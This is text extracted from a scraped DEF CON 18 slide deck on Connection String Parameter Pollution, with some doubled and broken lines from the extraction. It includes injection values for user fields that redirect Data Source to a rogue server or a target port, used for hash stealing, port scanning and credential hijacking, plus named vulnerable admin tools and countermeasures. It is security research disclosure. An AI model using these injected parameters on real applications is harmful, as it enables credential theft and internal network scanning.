Scribd
Upload
12 views

DEF CON 18 - Alonso-Palazon-String

Uploaded by

Itachi Kanade Eucliwood
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
12 views

DEF CON 18 - Alonso-Palazon-String

Uploaded by

Itachi Kanade Eucliwood
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 38

p

Chema Alonso
Informática 64
Connection Strings
• Define the way an application connects to
data repository
• There are connection strings for:
– Relational Databases (MSSQL, Oracle, MySQL,…)
– LDAP Directories
Di i
– Files
– Etc…
Databases Connection Strings

Data Source = myServerAddress;


Initial Catalog = myDataBase;
User Id = myUsername;
Password = myPassword;
Google Hacking
Google Hacking
UDL (Universal Data Links) Files
Credentials
Operating System Accounts Database Credentials
Data Source = Data Source =
myServerAddress; myServerAddress;
Initial Catalog = myDataBase; Initial Catalog = myDataBase;
User Id = myUsername; User Id = myUsername;
Password = myPassword; Password = myPassword;
Integrated Security = Integrated Security = No;
SSPI/True/Yes;
Users autheticated by Web App
Web application manages the login process

1.‐ Web applicaton


connects using its
Syslogins Connection string credentials to the
database.

2.‐ Asks user login


i f
information.
ti
Custom Select id from users
3.‐ Checks login
users table
information about info
stored in custom users
table.

Database Engine App running on Web Server


Users autheticated by Database
Database engine manages the login process
1.‐ Web application
asks for credentials.

2.‐ A connection
2 i string
i
is composed with the
Syslogins Connection string credentials to connect
to the database.

3.‐ Roles and permits


are limited by the user
used
sed in the connection
string

Database Engine App running on Web Server


Connection String Attacks
• It´s
It s possible to inject parameters into connection
strings using semi colons as separators

Data Source = myServerAddress;


I iti l Catalog
Initial C t l = myDataBase;
D t B
Integrated Security = NO;
User Id = myUsername;
Password = myPassword; Encryption = Off;
ConnectionStringBuiler
• Available in .NET Framework 2.0
• Build secure connection strings using parameters
• It´s not possible to inject into the connection string
Are people aware of this?
Connection String Parameter Pollution
• Thee goa
goal iss to inject
ject pa
parameters
a ete s in tthee co
connection
ect o
string, whether they exist or not

• Had duplicated a parameter, the last value wins

• This behavior allows attackers to re‐write


completly the connection string, therefore to
manipulate the way the appliation will work and
how should be the it authenticated
Pollutionable Behavior
Param1=Value A Param2=Value B Param1=Value C Param2=Value D

DBConnection Object
Param1

Param2
What can be done with CSPP?
Rewrite a parameter
Data Source=DB1 UID=sa password=Pwnd! Data Source=DB2

DBConnection Object
DataSource

UID

password
Scanning the DMZ

Development Finnacial Test Forgotten


Database 1 Database Database Database

Data
Web app Source
I t
Internet
t Production
FW vulnerable
to CSPP Database
Port Scanning a Server
DataSource

DB1,80
DB1,21
Web app DB1,25
Internet vulnerable Production
FW to CSPP Database
DB1 1445
DB1,1445
Server
What can be done with CSPP?
Add
dd a parameter
Data Source=DB1 UID=sa password=Pwnd! Integrated Security=True

DBConnection Object
DataSource

UID

password
CSPP Attack 1: Hash stealing
1 ‐ Run a Rogue Server on an accessibl IP address:
1.
Rogue_Server
2 Activate a sniffer to catch the login process
2.‐
Cain/Wireshark
3.‐ Duplicate Data Source parameter
Data_Source=Rogue_Server
4.‐ Force Windows Integrated Authentication
Integrated
g Security=true
y
CSPP Attack 1: Robo de Hash
Data source = SQL2005; initial catalog = db1;
Integrated Security=no; user id=+’User_Value’+;
Password=+’Password
Password=+ Password_Value
Value’+;+;

Data
D t source = SQL2005
SQL2005; iinitial
iti l catalog
t l = db1
db1;
Integrated Security=no; user id= ;Data
S
Source=Rogue_Server;
R S
Password=;Integrated Security=True;
CSSP 1:ASP.NET Enterprise Manager
CSPP Attack 2: Port Scanning
1 ‐ Duplicate the Data Source parameter setting
1.
on it the Target server and target port to be
scanned.
scanned
Data_Source=Target_Server,target_Port
2 Check the error messages:
2.‐
‐ No TCP Connection ‐> Port is opened
‐ No SQL Server ‐> Port is closed
‐ SQL Server ‐> Invalid Password
CSPP Attack 2: Port Scanning
Data source = SQL2005; initial catalog = db1;
Integrated Security=no; user id=+’User_Value’+;
Password=+’Password
Password=+ Password_Value
Value’+;+;

Data
D t source = SQL2005
SQL2005; iinitial
iti l catalog
t l = db1
db1;
Integrated Security=no; user id= ;Data
S
Source=Target_Server,
T t S T
Target_Port;
t P t
Password=;Integrated Security=True;
CSPP 2: myLittleAdmin
Port is Opened
CSPP 2: myLittleAdmin
Port is Closed
CSPP Attack 3: Hijacking Web Credentials
1 ‐ Duplicate Data Source parameter to the
1.
target SQL Server
Data Source=Target Server
Data_Source=Target_Server
2.‐ Force Windows Authentication
Integrated Security=true
3.‐ Application
pp pool in which the web app
p pp is
running on will send its credentials in order to
logg in to the database engine.
g
CSPP Attack 3: Hijacking Web Credentials
Data source = SQL2005; initial catalog = db1;
Integrated Security=no; user id=+’User_Value’+;
Password=+’Password
Password=+ Password_Value
Value’+;+;

Data
D t source = SQL2005
SQL2005; iinitial
iti l catalog
t l = db1
db1;
Integrated Security=no; user id= ;Data
S
Source=Target_Server;
T t S
Password=;Integrated Security=true;
CSPP Attack 3: Web Data Administrator
CSPP Attack 3:
myLittleAdmin/myLittleBackup
l d / l k
CSPP Attack 3: ASP.NET Enterprise Manager
Other Databases
• MySQL
– Does not support Integrated security
– It´s possible to manipulate the behavior of the web application,
although
• Port Scanning
• Connect to internal/testing/for developing Databases
• Oracle supports integrated authority running on Windows
and
d UNIX/Linux
UNIX/Li servers
– It´s possible to perform all described attacks
• Hash stealing
• Port
P t SScanning
i
• Hijacking Web credentials
– Also it´s possible to elevate a connection to sysdba in order to
shutdown/startup an instance
myLittleAdmin/myLittleBackup

myLittleTools released a secury advisory and a patch about this


ASP.NET Enterprise Manager
• ASP.NET Enterprise Manager is “abandoned”, but it´s
been used in a lot of web Control Panels.

• Fix the code yourself


ASP.NET Enterprise Manager
• ASP.NET Enterprise Manager is “abandoned”, but it´s
been used in a lot of web Control Panels.
Panels

• Fix the
h code yourself
lf
ASP.NET Web Data Admistrator

ASP Web Data Administrator is secure in CodePlex web site, but not in
Microsoft web site where is been published an unsecure old version
Countermeasures
• Harden
a de you
your firewall
e a
– Outbound connections
• Harden yyour internal accounts
– Web application
– Web server
– Database Engine
• Use ConnectionStringBuilder

• Filter the ;)
Questions?
Contacto
Chema Alonso
[email protected]
http://www.informatica64.com
http://elladodelmal.blogspot.com
Palako
[email protected]

Authors
Chema Alonso
Manuel Fernández “The Sur”
Alejandro Martín Bailón
Antonio Guzmán

You might also like